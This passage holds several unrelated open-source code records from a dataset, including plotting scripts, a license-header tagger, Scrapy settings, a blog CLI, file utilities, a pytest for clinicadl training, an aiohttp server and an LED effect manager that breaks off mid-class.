\n # # - legend: average success rate, success run2, success run12\n # success_a = np.genfromtxt(\"results/run{0:d}_successRates\".format(run2plot[0]),skip_header=1)\n # success_a = success_a[:,1]\n # success_b = np.genfromtxt(\"results/run{0:d}_successRates\".format(run2plot[1]),skip_header=1)\n # success_b = success_b[:,1]\n # Tupdate = np.arange(0,numTMatrixUpdates,1)\n\n # success_sum = np.zeros(numTMatrixUpdates)\n # success_sum_prev = np.zeros(numTMatrixUpdates)\n # for i in range(1,NUM_RUNS):\n # if i == 11 or i == 16:\n # continue\n # success = np.genfromtxt(\"results/run{0:d}_successRates\".format(i),skip_header=1)\n # success = success[:,1]\n # success_sum = success_sum + success\n # success_avg = success_sum/(NUM_RUNS-1)\n\n # plt.plot(Tupdate, success_a, label = 'run{0:d}'.format(run2plot[0]))\n # plt.plot(Tupdate, success_b, label = 'run{0:d}'.format(run2plot[1]))\n # plt.plot(Tupdate, success_avg, label = 'avg')\n # ax = plt.gca()\n # ax.xaxis.set_major_locator(MaxNLocator(integer=True))\n # plt.ylabel('success')\n # plt.xlabel('update number')\n # plt.title('Success vs. T_matrix Updates')\n # plt.legend()\n # plt.savefig('figures/success_vs_T.png', dpi=600)\n # # plt.show()\n # plt.close()\n\n # # ----------------------------------\n # # Plot Transition Matrix values convergence \n\n # # ------ 1) Diagonal values (legend with 6 numbers)\n # plt.subplot(211)\n # # Tdiag: each row has the 6 diagonal elements of one T matrix\n # # each column is the evolution of an element through the iterations\n # Tdiag = np.zeros((numTMatrixUpdates, n_primitives)) \n # for i in range(numTMatrixUpdates):\n # T = np.genfromtxt(\"transitions/T_{0:d}\".format(i))\n # Tdiag[i,:] = T.diagonal() # the 6 diagonal elements \n # Tupdate = np.arange(0,numTMatrixUpdates,1)\n\n # for i in range(n_primitives):\n # plt.plot(Tupdate, Tdiag[:,i], label = 'T[{0:d},{1:d}]'.format(i+1,i+1))\n # ax1 = plt.gca()\n # ax1.xaxis.set_major_locator(MaxNLocator(integer=True))\n # # plt.xlabel('update number')\n # plt.ylabel('diagonal values')\n # ax1.title.set_text('T Matrix Convergence: Diagonal Elements')\n # # plt.savefig('figures/T_diag_convergence.png', dpi=600)\n # plt.legend(loc=3, prop={'size': 6})\n\n # # ------ 2) 2norm of the difference between successive Ts\n # plt.subplot(212)\n # # Tdiff: frobenious norm of the difference between consecutive Ts\n # Tdiff = np.zeros(numTMatrixUpdates-1) \n # for i in range(numTMatrixUpdates-1):\n # T = np.genfromtxt(\"transitions/T_{0:d}\".format(i))\n # Tnext = np.genfromtxt(\"transitions/T_{0:d}\".format(i+1))\n # Tdiff[i] = np.sqrt((np.linalg.norm(T-Tnext, 'fro')/36))\n # Tupdate = np.arange(1,numTMatrixUpdates,1)\n # plt.plot(Tupdate, Tdiff)\n # ax2 = plt.gca()\n # ax2.xaxis.set_major_locator(MaxNLocator(integer=True))\n # plt.xlabel('update number')\n # plt.ylabel('change in T values')\n # ax2.title.set_text('T Matrix Convergence: $||T_{i+1} - T_i||_{FRO}$')\n # plt.tight_layout()\n # plt.savefig('figures/T_convergence.png', dpi=600)\n # plt.show()\n # plt.close()\n\n # ----------------------------------\n # Plot confusion matrix \n\n print(\"---------- FIN -------------\")\n","sub_path":"analysis/gmm_pipe.py","file_name":"gmm_pipe.py","file_ext":"py","file_size_in_byte":39227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"110522084","text":"import argparse\nimport re\nimport sys\nimport time\nfrom collections import defaultdict\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom _math import plt_pause\n\n\ndef plot_time_series(metric_regex, samples=500):\n plt.style.use(\"bmh\")\n\n # Setup ESC key to exit live plot\n request_exit = False\n\n def key_pressed(event):\n nonlocal request_exit\n\n if event.key == \"escape\":\n request_exit = True\n\n fig, _ = plt.subplots()\n fig.canvas.mpl_connect(\"key_press_event\", key_pressed)\n plt.show(block=False)\n\n data = defaultdict(list)\n frame_index = 0\n\n last_update = 0.0\n\n while True:\n line = sys.stdin.readline()\n if line == \"\":\n break\n else:\n line = line.rstrip(\"\\n\")\n\n if request_exit:\n break\n\n for name, patt in metric_regex.items():\n match = re.findall(patt, line)\n if match:\n val = float(match[0])\n data[name].append(val)\n frame_index = len(data[name]) + 1\n\n now = time.time()\n if now - last_update > 0.5:\n plt.cla()\n for name, ys in data.items():\n maxsize = min(len(ys), samples)\n plt.plot(\n np.arange(frame_index, frame_index + maxsize),\n ys[-samples:],\n label=name,\n )\n\n plt.legend()\n plt.ylim(bottom=-2, top=10)\n plt_pause(0.01)\n last_update = now\n\n plt.close()\n\n print(\"Live plot closed.\")\n\n df = pd.DataFrame.from_dict(data, orient=\"index\")\n df = df.transpose()\n df.to_csv(\"data.csv\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--metric\",\n \"-m\",\n metavar=\"METRIC=REGEX\",\n nargs=\"+\",\n help=\"Provide both the name and regular expression to match the metric.\",\n )\n args = parser.parse_args()\n\n metric_regex = {\n m.split(\"=\", 1)[0]: re.compile(m.split(\"=\", 1)[1]) for m in args.metric\n }\n plot_time_series(metric_regex=metric_regex)\n","sub_path":"scripts/r/live_plot.py","file_name":"live_plot.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"632773365","text":"#!/usr/bin/env python \n# -*- python -*-\n#BEGIN_LEGAL\n#\n#Copyright (c) 2016 Intel Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# \n#END_LEGAL\nfrom __future__ import print_function\nimport sys\nimport os\nimport re\nfrom stat import *\n\n\ndef _get_mode(fn):\n \"get the mode of the file named fn, suitable for os.chmod() or open() calls\"\n mode = os.stat(fn)[ST_MODE]\n cmode = S_IMODE(mode)\n return cmode\n\ndef _replace_original_with_new_file(file,newfile):\n \"Replace file with newfile\"\n # os.system(\" mv -f %s %s\" % ( newfile, file))\n os.unlink(file)\n os.rename(newfile,file)\n\ndef _remove_existing_header(contents,prefix=\"#\"):\n \"remove existing legal header, if any\"\n retval = []\n skipping = False\n start_pattern = re.compile(r\"^(/[*]BEGIN_LEGAL)|(\" + prefix + \"BEGIN_LEGAL)\")\n stop_pattern = re.compile(r\"^[ ]*(END_LEGAL[ ]?[*]/)|(\" + prefix + \"[ ]*END_LEGAL)\")\n for line in contents:\n if start_pattern.match(line):\n skipping = True\n if skipping == False:\n retval.append(line)\n if stop_pattern.match(line):\n skipping = False\n return retval\n\ndef _prepend_script_comment(header,prefix=\"#\"):\n \"Apply script comment marker to each line\"\n retval = []\n for line in header:\n retval.append( prefix + line )\n return retval\n\ndef apply_header_to_source_file(header, file):\n \"apply header to file using C++ comment style\"\n f = open(file,\"r\")\n mode = _get_mode(file)\n contents = f.readlines()\n f.close()\n trimmed_contents = _remove_existing_header(contents)\n newfile = file + \".new\"\n o = open(newfile,\"w\")\n o.write(\"/*BEGIN_LEGAL \\n\")\n o.writelines(header)\n o.write(\"END_LEGAL */\\n\")\n o.writelines(trimmed_contents)\n o.close()\n os.chmod(newfile,mode)\n _replace_original_with_new_file(file,newfile)\n\n# FIXME: this will flag files that have multiline C-style comments\n# with -*- in them even though the splitter will not look for the\n# comment properly\n\ndef _shell_script(lines):\n \"\"\"return true if the lines are the start of shell script or\n something that needs a mode comment at the top\"\"\"\n \n first = \"\"\n second = \"\"\n if len(lines) > 0:\n first = lines[0];\n if len(lines) > 1:\n second = lines[1];\n \n if re.match(\"#!\",first):\n return True\n if re.search(\"-\\*-\",first) or re.search(\"-\\*-\",second):\n return True\n return False\n\ndef _split_script(lines):\n \"Return a tuple of (header, body) for shell scripts, based on an input line list\"\n header = []\n body = []\n\n f = lines.pop(0)\n while re.match(\"#\",f) or re.search(\"-\\*-\",f):\n header.append(f)\n f = lines.pop(0)\n\n # tack on the first non matching line from the above loop\n body.append(f);\n body.extend(lines);\n return (header,body)\n\ndef _write_script_header(o,lines,prefix=\"#\"):\n \"Write the file header for a script\"\n o.write(prefix+\"BEGIN_LEGAL\\n\")\n o.writelines(lines)\n o.write(prefix+\"END_LEGAL\\n\")\n \ndef apply_header_to_data_file(header, file, prefix=\"#\"):\n \"apply header to file using script comment style\"\n f = open(file,\"r\")\n mode = _get_mode(file)\n contents = f.readlines()\n f.close()\n trimmed_contents = _remove_existing_header(contents, prefix)\n newfile = file + \".new\"\n o = open(newfile,\"w\")\n augmented_header = _prepend_script_comment(header,prefix)\n if _shell_script(trimmed_contents):\n (script_header, script_body) = _split_script(trimmed_contents)\n o.writelines(script_header)\n _write_script_header(o, augmented_header, prefix)\n o.writelines(script_body)\n else:\n _write_script_header(o,augmented_header,prefix)\n o.writelines(trimmed_contents)\n o.close()\n os.chmod(newfile,mode)\n _replace_original_with_new_file(file,newfile)\n\n####################################################################\n### MAIN\n####################################################################\nif __name__ == '__main__':\n if len(sys.argv) < 4:\n print (\"Usage \" + sys.argv[0] + \" [-s|-t] legal-header file-name [file-name...]\\n\")\n sys.exit(1)\n\n type = sys.argv[1]\n header_file = sys.argv[2]\n if not os.path.exists(header_file):\n print (\"Could not find header file: [%s]\\n\" % (header_file))\n sys.exit(1)\n\n files_to_tag = sys.argv[3:]\n f = open(header_file,\"r\")\n header = f.readlines()\n f.close()\n\n sources = files_to_tag\n\n if type == \"-s\":\n for file in sources:\n if re.search(\".svn\",file) == None and re.search(\".new$\",file) == None:\n apply_header_to_source_file(header, file.strip())\n elif type == \"-t\":\n for file in sources:\n if re.search(\".svn\",file) == None and re.search(\".new$\",file) == None:\n apply_header_to_data_file(header, file.strip())\n else:\n print (\"2nd argument must be -s or -t\\n\")\n sys.exit(1)\n","sub_path":"mbuild/header_tag.py","file_name":"header_tag.py","file_ext":"py","file_size_in_byte":5463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"559674853","text":"#======== setup.py ===========\nfrom distutils.core import setup\nfrom Cython.Build import cythonize\n\nfrom distutils.extension import Extension\nfrom Cython.Distutils import build_ext\nimport subprocess\nimport numpy\n\nproc_libs = subprocess.check_output(\"pkg-config --libs eigen3 egl glew pcl_io-1.8\".split())\nproc_incs = subprocess.check_output(\"pkg-config --cflags eigen3 egl glew pcl_io-1.8\".split())\n\nlibs = [lib.encode('utf-8') for lib in proc_libs.split()]\nincs= [inc.encode('utf-8') for inc in proc_incs.split()]\nincs_new = []\nfor inc in incs:\n if '-I' in inc:\n inc = inc[2:]\n incs_new.append(inc)\n\nincs = incs_new\nincs = incs + [numpy.get_include()]\nlibs = libs + ['-lboost_system']\n\nsetup(\n cmdclass = {'build_ext': build_ext},\n ext_modules = cythonize(Extension(\"projector\",\n sources = [\"projector.pyx\"],\n language = \"c++\",\n include_dirs=incs,\n extra_link_args=libs\n )\n )\n)\n","sub_path":"self_localization/renderer/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"508758158","text":"# -*- coding: utf-8 -*-\n\n# Scrapy settings for domain_com project\n#\n# For simplicity, this file contains only settings considered important or\n# commonly used. You can find more settings consulting the documentation:\n#\n# https://doc.scrapy.org/en/latest/topics/settings.html\n# https://doc.scrapy.org/en/latest/topics/downloader-middleware.html\n# https://doc.scrapy.org/en/latest/topics/spider-middleware.html\n\nBOT_NAME = 'domain_com'\n\nSPIDER_MODULES = ['domain_com.spiders']\nNEWSPIDER_MODULE = 'domain_com.spiders'\n\n\n\nCOOKIES_ENABLED = False\nDOWNLOAD_DELAY = .5\nCONCURRENT_REQUESTS = 20\nCONCURRENT_REQUESTS_PER_DOMAIN = 1\n\nDOWNLOAD_TIMEOUT = 30\n\n# DOWNLOAD_DELAY = .1 # Autothrottle never goes below this value and so we have to set it to low\n# AUTOTHROTTLE_ENABLED = True\n# AUTOTHROTTLE_DEBUG = True\n# AUTOTHROTTLE_MAX_DELAY = 10.0\n# AUTOTHROTTLE_TARGET_CONCURRENCY = 1\n\nDOWNLOADER_MIDDLEWARES = {\n 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware' : None,\n}\n# FEED_URI=\"/home/domain.csv\"\n#\n# FEED_EXPORTERS = {\n# 'csv': 'scrapy.contrib.exporter.CsvItemExporter',\n# }\nFEED_FORMAT = 'csv'","sub_path":"domain_com/domain_com/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"270809853","text":"import pandas as pd\r\nfrom keras.models import load_model\r\nfrom keras.preprocessing.sequence import pad_sequences\r\nimport joblib\r\n\r\nmodelPath = \"F:/IndustryProject/word2vec_model.h5\"\r\ntokenizerPath = \"F:/IndustryProject/word2vec_tokenizer.pkl\"\r\nscalarPath = \"F:/IndustryProject/word2vec_scaler.pkl\"\r\nfilePath = \"F:/IndustryProject/PickleDataCountV8\"\r\n\r\nmodel = load_model(modelPath)\r\ntokenizer = joblib.load(tokenizerPath)\r\nscaler = joblib.load(scalarPath)\r\ndf = pd.read_pickle(filePath)\r\n\r\n\r\ninputVectors = tokenizer.texts_to_sequences(df['Text'])\r\ninputVectors = pad_sequences(inputVectors, padding='post', maxlen=8906)\r\noutput = model.predict(inputVectors)\r\ndf['Predicted'] = scaler.inverse_transform(output)\r\n\r\ndf[['Path', 'WordCount', 'CharCount', 'StopWords', 'Sentence', 'Predicted']].to_csv(\"F:/IndustryProject/TestingWord2Vec.csv\")","sub_path":"Python/Processing/TestWord2Vec.py","file_name":"TestWord2Vec.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"27554395","text":"import mot\nimport os\nimport argparse\nimport collections\nfrom http.server import HTTPServer, SimpleHTTPRequestHandler\n\nclass InitAction(argparse.Action):\n def __init__(self, **kwargs):\n super(InitAction, self).__init__(**kwargs)\n\n def __call__(self, parser, namespace, values, option_strings=None):\n # print('{} {} {}'.format(namespace, values, option_strings))\n cfg = collections.OrderedDict()\n cfg['sitename'] = input('site name>') or 'Untitled'\n cfg['payoff'] = input('site payoff>') or 'Payoff'\n cfg['author'] = input('site owner>') or 'anonymuse'\n cfg['theme'] = input('theme>') or 'default'\n cfg['github'] = 'https://github.com/'.format(input('github>'))\n cfg['twitter'] = 'https://twitter.com/'.format(input('twitter>'))\n mot.bootstrap(cfg)\n\nclass BuildAction(argparse.Action):\n def __init__(self, **kwargs):\n super(BuildAction, self).__init__(**kwargs)\n \n def __call__(self, parser, namespace, values, option_strings=None):\n mot.Theme().build()\n\nclass ServerAction(argparse.Action):\n def __init__(self, **kwargs):\n super(ServerAction, self).__init__(**kwargs)\n \n def __call__(self, parser, namespace, values, option_strings=None):\n os.chdir(mot.DIST_PATH)\n server_address = ('', 8000)\n httpd = HTTPServer(server_address, SimpleHTTPRequestHandler)\n httpd.serve_forever()\n\nclass PostNew(argparse.Action):\n def __init__(self, **kwargs):\n super(PostNew, self).__init__(**kwargs)\n\n def __call__(self, parser, namespace, values, option_strings=None):\n print('{} {} {}'.format(namespace, values, option_strings))\n if type(namespace.__dict__['title']) == list:\n title = ' '.join(namespace.__dict__['title'])\n else:\n title = namespace.__dict__['title']\n post = mot.Post()\n post.set_title(title)\n post.set_date()\n post.save()\n\nparser = argparse.ArgumentParser(mot.__description__)\nsubparsers = parser.add_subparsers(help='pending')\n\nparser2 = subparsers.add_parser('init', help='%(prog)s initialize new blog')\nparser2.add_argument('run', nargs=0, action=InitAction, help=argparse.SUPPRESS)\n\nprsr = subparsers.add_parser('build', help='%(prog)s build new blog')\nprsr.add_argument('run', nargs=0, action=BuildAction, help=argparse.SUPPRESS)\n\nprsr = subparsers.add_parser('server', help='%(prog)s build new blog')\nprsr.add_argument('run', nargs=0, action=ServerAction, help=argparse.SUPPRESS)\n\nprsr = subparsers.add_parser('post', help='post management')\nprsr.add_argument('new', nargs=1)\nprsr.add_argument('title', nargs='+', type=str)\nprsr.add_argument('--author', nargs='*', type=str)\nprsr.add_argument('--date', nargs='*', type=str)\nprsr.add_argument('run', nargs=0, action=PostNew, help='new post')\n\nargs = parser.parse_args()\n\n","sub_path":"mot/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"37230004","text":"#FUAQ lê uma matriz M [3][4]. Calcular e mostrar o somatório dos\n#valores contidos na segunda linha.\n\nm=[[0 for i in range (3)]for i in range(4)]\nfor l in range(3):\n for c in range(4):\n m[l][c]=int(input('Digite: '))\nacum=0\nfor c in range(4):\n acum+=m[1][c]\nprint('Somatorio:',acum)","sub_path":"exercicio 43 - Matriz.py","file_name":"exercicio 43 - Matriz.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"267648853","text":"import os\nimport csv\nimport zipfile\nimport numpy as np\nimport pandas as pd\nimport logging\nimport traceback\n\n\nclass FileUtil:\n \"\"\"\n ファイルのUtilクラス\n \"\"\"\n \n @staticmethod\n def check_file_exist(filepath):\n \"\"\"\n ファイル/フォルダの存在を確認\n \n Parameters\n ----------\n filepath: string\n ファイルパス\n \n Returns\n ----------\n TRUE/FALSE\n\n Raises\n ----------\n TypeError\n 誤った引数の型が指定された場合\n Exception\n その他例外が発生した場合\n \"\"\"\n\n try:\n if os.path.isfile(filepath):\n return True\n else:\n return False\n except TypeError:\n logging.error(\"引数の型が間違っています。\")\n raise TypeError\n except:\n logging.error(\"ファイル/フォルダのチェック中に予期しない例外が発生しました。\")\n traceback.print_exc()\n raise Exception\n \n @staticmethod\n def read_csv_file_by_std(filepath):\n \"\"\"\n 標準ライブラリでcsvファイルから読み込み\n \n Parameters\n ----------\n filepath: string\n ファイルパス\n \n Returns\n ----------\n numpy_data: ndarray\n numpyデータ\n\n Raises\n ----------\n TypeError\n 誤った引数の型が指定された場合\n Exception\n その他例外が発生した場合\n \"\"\"\n\n try:\n with open(filepath, newline='') as csvfile:\n csv_reader = csv.reader(csvfile, delimiter=',', quotechar='\"')\n for row in csv_reader:\n numpy_data = np.array(row)\n return numpy_data\n except TypeError:\n logging.error(\"引数の型が間違っています。\")\n raise TypeError\n except:\n logging.error(\"標準ライブラリでcsvファイルを読み込み中に予期しない例外が発生しました。\")\n traceback.print_exc()\n raise Exception\n \n @staticmethod\n def read_csv_file_by_numpy(filepath, value=None):\n \"\"\"\n numpyでcsvファイルから読み込み\n \n Parameters\n ----------\n filepath: string\n ファイルパス\n value: variable\n 補完値\n \n Returns\n ----------\n numpy_data: ndarray\n numpyデータ\n\n Raises\n ----------\n TypeError\n 誤った引数の型が指定された場合\n Exception\n その他例外が発生した場合\n \"\"\"\n\n try:\n numpy_data = np.genfromtxt(filepath, delimiter=\",\", filling_values=value)\n return numpy_data\n except TypeError:\n logging.error(\"引数の型が間違っています。\")\n raise TypeError\n except:\n logging.error(\"numpyでcsvファイルを読み込み中に予期しない例外が発生しました。\")\n traceback.print_exc()\n raise Exception\n\n @staticmethod\n def read_csv_file_by_pandas(filepath):\n \"\"\"\n pandasでcsvファイルから読み込み\n \n Parameters\n ----------\n filepath: string\n ファイルパス\n \n Returns\n ----------\n pandas_data: DataFrame\n pandasデータ\n\n Raises\n ----------\n TypeError\n 誤った引数の型が指定された場合\n Exception\n その他例外が発生した場合\n \"\"\"\n\n try:\n pandas_data = pd.read_csv(filepath, delimiter=\",\", header=None)\n return pandas_data\n except TypeError:\n logging.error(\"引数の型が間違っています。\")\n raise TypeError\n except:\n logging.error(\"pandasでcsvファイルを読み込み中に予期しない例外が発生しました。\")\n traceback.print_exc()\n raise Exception\n\n @staticmethod\n def read_zip_file_by_std(execPath, filename):\n \"\"\"\n 標準ライブラリでzipファイルから解凍せずに読み込む\n \n Parameters\n ----------\n execPath: string\n 実行パス\n filename: string\n ファイル名\n \n Returns\n ----------\n numpy_data: ndarray\n numpyデータ\n\n Raises\n ----------\n TypeError\n 誤った引数の型が指定された場合\n Exception\n その他例外が発生した場合\n \"\"\"\n\n try:\n with zipfile.ZipFile(execPath + '/' + filename, 'r') as post:\n for info in post.infolist():\n # ファイルパスでスキップ判定\n if not os.path.isfile(execPath + '/' + info.filename):\n continue\n\n file_data = post.read(info.filename).decode('utf-8')\n for row in file_data.split('\\n'):\n if numpy_data is None:\n numpy_data = np.array(row)\n else:\n numpy_data = np.vstack((numpy_data, np.array(row)))\n return numpy_data\n except TypeError:\n logging.error(\"引数の型が間違っています。\")\n raise TypeError\n except:\n logging.error(\"zipファイルから読み込み中に予期しない例外が発生しました。\")\n traceback.print_exc()\n raise Exception\n \n @staticmethod\n def write_csv_file_by_std(numpy_data, filepath):\n \"\"\"\n 標準ライブラリでcsvファイルへ書き込み\n \n Parameters\n ----------\n numpy_data: ndarray\n numpyデータ\n filepath: string\n ファイルパス\n\n Raises\n ----------\n TypeError\n 誤った引数の型が指定された場合\n Exception\n その他例外が発生した場合\n \"\"\"\n\n try:\n with open(filepath, 'w') as csvfile:\n writer = csv.writer(csvfile, lineterminator='\\n') # 改行コード(\\n)を指定しておく\n writer.writerows(numpy_data)\n except TypeError:\n logging.error(\"引数の型が間違っています。\")\n raise TypeError\n except:\n logging.error(\"標準ライブラリでcsvファイルへ書き込み中に予期しない例外が発生しました。\")\n traceback.print_exc()\n raise Exception\n\n @staticmethod\n def write_csv_file_by_numpy(numpy_data, filepath):\n \"\"\"\n numpyでcsvファイルへ書き込み\n\n Parameters\n ----------\n numpy_data: ndarray\n numpyデータ\n filepath: string\n ファイルパス\n\n Raises\n ----------\n TypeError\n 誤った引数の型が指定された場合\n Exception\n その他例外が発生した場合\n \"\"\"\n\n try:\n np.savetxt(filepath, numpy_data, delimiter=\",\")\n except TypeError:\n logging.error(\"引数の型が間違っています。\")\n raise TypeError\n except:\n logging.error(\"numpyでcsvファイルへ書き込み中に予期しない例外が発生しました。\")\n traceback.print_exc()\n raise Exception\n\n @staticmethod\n def write_csv_file_by_pandas(pandas_data, filepath):\n \"\"\"\n pandasでcsvファイルへ書き込み\n\n Parameters\n ----------\n pandas_data: DataFrame\n pandas出力データ\n filepath: string\n ファイルパス\n\n Raises\n ----------\n TypeError\n 誤った引数の型が指定された場合\n Exception\n その他例外が発生した場合\n \"\"\"\n\n try:\n pandas_data.pandas_data.to_csv(filepath)\n except TypeError:\n logging.error(\"引数の型が間違っています。\")\n raise TypeError\n except:\n logging.error(\"pandasでcsvファイルへ書き込み中に予期しない例外が発生しました。\")\n traceback.print_exc()\n raise Exception\n","sub_path":"python_pj/utils/FileUtil.py","file_name":"FileUtil.py","file_ext":"py","file_size_in_byte":8627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"106673135","text":"# -*- coding: utf8 -*-\n\nimport json\nimport os\n\nimport settings\n\n\ndef load_data(file_name, directory=None):\n if directory is None:\n directory = settings.DATA_DIRECTORY\n\n obj = None\n try:\n with open(os.path.join(directory, file_name)) as fp:\n obj = fp.read()\n except IOError:\n pass\n\n return json.loads(obj) if obj else {}\n\n\ndef save_data(file_name, obj_to_save, directory=None):\n if directory is None:\n directory = settings.DATA_DIRECTORY\n\n with open(os.path.join(directory, file_name), 'w') as fp:\n if hasattr(obj_to_save, 'serialize'):\n fp.write(json.dumps(obj_to_save.serialize()))\n else:\n fp.write(json.dumps(obj_to_save))\n\n\ndef data_exists(file_name, directory=None):\n if directory is None:\n directory = settings.DATA_DIRECTORY\n return os.path.isfile(os.path.join(directory, file_name))\n","sub_path":"tool/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"183695803","text":"# coding: utf8\n\nimport json\nimport os\nimport shutil\n\nimport pytest\n\n\n@pytest.fixture(\n params=[\n \"train_image_ae\",\n \"train_patch_ae\",\n \"train_roi_ae\",\n \"train_slice_ae\",\n ]\n)\ndef cli_commands(request):\n if request.param == \"train_image_ae\":\n mode = \"image\"\n test_input = [\n \"train\",\n \"reconstruction\",\n \"data/dataset/random_example\",\n \"extract_image.json\",\n \"data/labels_list\",\n \"results\",\n \"-c\",\n \"data/train_config.toml\",\n ]\n elif request.param == \"train_patch_ae\":\n mode = \"patch\"\n test_input = [\n \"train\",\n \"reconstruction\",\n \"data/dataset/random_example\",\n \"extract_patch.json\",\n \"data/labels_list\",\n \"results\",\n \"-c\",\n \"data/train_config.toml\",\n ]\n elif request.param == \"train_roi_ae\":\n mode = \"roi\"\n test_input = [\n \"train\",\n \"reconstruction\",\n \"data/dataset/random_example\",\n \"extract_roi.json\",\n \"data/labels_list\",\n \"results\",\n \"-c\",\n \"data/train_config.toml\",\n ]\n elif request.param == \"train_slice_ae\":\n mode = \"slice\"\n test_input = [\n \"train\",\n \"reconstruction\",\n \"data/dataset/random_example\",\n \"extract_slice.json\",\n \"data/labels_list\",\n \"results\",\n \"-c\",\n \"data/train_config.toml\",\n ]\n else:\n raise NotImplementedError(\"Test %s is not implemented.\" % request.param)\n\n return test_input, mode\n\n\ndef test_train(cli_commands):\n if os.path.exists(\"results\"):\n shutil.rmtree(\"results\")\n\n test_input, mode = cli_commands\n if os.path.exists(\"results\"):\n shutil.rmtree(\"results\")\n flag_error = not os.system(\"clinicadl \" + \" \".join(test_input))\n assert flag_error\n with open(os.path.join(\"results\", \"maps.json\"), \"r\") as f:\n json_data = json.load(f)\n assert json_data[\"mode\"] == mode\n\n shutil.rmtree(\"results\")\n","sub_path":"tests/test_train_ae.py","file_name":"test_train_ae.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"10585084","text":"import asyncio\n\nfrom aiohttp import web\n\nimport logic\n\npoemtryMachine = logic.getPoemtryJson()\n\nasync def job(request):\n text = next(poemtryMachine)\n return web.Response(body=text.encode('utf-8'))\n\nasync def init(loop):\n app = web.Application(loop=loop)\n app.router.add_route('GET', '/job', job)\n srv = await loop.create_server(app.make_handler(), '127.0.0.1', 8000)\n print('Server started at http://127.0.0.1:8000...')\n return srv\n\nloop = asyncio.get_event_loop()\nloop.run_until_complete(init(loop))\nloop.run_forever()\n","sub_path":"python-server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"180729978","text":"from renderers.teensy import serial_constants\nimport utils\n\nclass EffectManager(object):\n\n def __init__(self, nlights=serial_constants.TOTAL_LEDS):\n self.nlights = nlights #total number of LEDs\n a = list(range(self.nlights)) #list with index number for every led\n self.lightDict = dict.fromkeys(a) #dictionary {ledIndex: color}\n\n #LED indices for 8 separate segments\n g = [200, 420, 540, 660, 865, 1071, 1192]\n s0 = list(range(0,g[0]))\n s1 = list(range(g[0],g[1]))\n s2 = list(range(g[1],g[2]))\n s3 = list(range(g[2],g[3]))\n s4 = list(range(g[3],g[4]))\n s5 = list(range(g[4],g[5]))\n s6 = list(range(g[5],g[6]))\n s7 = list(range(g[6],self.nlights))\n\n\n #dictionary containing indices for leds in all segments\n self.sectionsDict = {0:s0, 1:s1, 2:s2, 3:s3, 4:s4, 5:s5, 6:s6, 7:s7}\n\n #make all the LEDs in one section one color\n def colorSections(self, sectionList, color):\n for sectionNum in sectionList:\n for ledNum in self.sectionsDict[sectionNum]:\n self.lightDict[ledNum] = color\n\n #make all the LEDs in half a section one color\n #sectionTupleList should be (sectionNum, 0 or 1) 0 or 1 for different halves\n def colorHalfSections(self, sectionTupleList, color):\n for sectionNum,half in sectionTupleList:\n count = 0\n for ledNum in self.sectionsDict[sectionNum]:\n if count < len(self.sectionsDict[sectionNum])//2 and half == 0:\n self.lightDict[ledNum] = color\n elif count > len(self.sectionsDict[sectionNum])//2 and half == 1:\n self.lightDict[ledNum] = color\n\n count = count + 1\n\n #turns every 3rd LED in a section on for a strobe effect\n def strobeSection(self, sectionList):\n for sectionNum in sectionList:\n for ledNum in self.sectionsDict[sectionNum]:\n if ledNum % 3 == 0:\n self.lightDict[ledNum] = utils.hsv_to_rgb(1, 0, 1)\n\n def toByteArray(self):\n output = []\n for k,v in self.lightDict.items():\n if v != None:\n x = 'L'.encode()\n output.append(x)\n i0 = k & 255 #low order bits\n i1 = (k & 65280) >> 8 #high order bits\n output.append(i0)\n output.append(i1)\n output.append(v[0])\n output.append(v[1])\n output.append(v[2])\n return bytearray(output)\n\n def get_light_Dict(self):\n return self.lightDict\n\n#Generates a moving \"snake\" of light, length, velocity, and time of existance\n#can be specified\nclass snake(object):\n def __init__(self, color, nlights=serial_constants.TOTAL_LEDS, start = 0,\n length = 1, velocity = 1, duration = 100, fade = True):\n self.nlights = nlights #total number of LEDs\n a = list(range(start, start+length)) #list with index number for leds in snake\n self.lightDict = dict.fromkeys(a) #dictionary {ledIndex: color}\n self.velocity = velocity\n self.length = length\n self.deathIndex = start + duration\n\n if fade:\n count = 0;\n for i in self.lightDict.keys():\n c = dim_hex_color(color, 1-count*0.05)\n self.lightDict[i] = color;\n count = count + 1\n else:\n for i in self.lightDict.keys():\n self.lightDict[i] = 